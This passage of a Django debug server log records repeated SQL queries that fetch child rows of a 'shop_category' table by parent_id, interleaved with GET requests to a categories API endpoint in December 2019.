"shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:42:53,448 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:42:53,450 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:42:53,453 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:42:53,455 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:42:53,457 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:42:53,460 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:42:53,463 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:42:53] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:42:57,782 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:42:57,792 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:42:57,797 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:42:57,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:42:57,805 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:42:57,809 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:42:57,813 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:42:57,816 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:42:57,819 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:42:57,824 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:42:57,828 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:42:57,831 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:42:57,834 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:42:57,838 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:42:57,843 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:42:57,847 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:42:57,851 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:42:57,855 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:42:57,859 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:42:57,866 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:42:57,872 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:42:57,876 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:42:57,880 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:42:57,884 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:42:57,888 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:42:57,894 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:42:57,898 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:42:57,901 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:42:57,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:42:57,909 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:42:57,915 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:42:57,919 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:42:57,923 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:42:57,927 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:42:57,931 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:42:57,937 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:42:57,941 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:42:57,945 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:42:57,949 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:42:57,953 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:42:57,957 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:42:57,962 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:42:57,966 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:42:57,970 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:42:57,975 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:42:57,979 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:42:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:43:02,396 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:43:02,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:43:02,408 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:43:02,410 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:43:02,414 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:43:02,417 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:43:02,421 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:43:02,423 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:43:02,426 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:43:02,429 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:43:02,431 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:43:02,433 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:43:02,436 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:43:02,438 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:43:02,441 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", 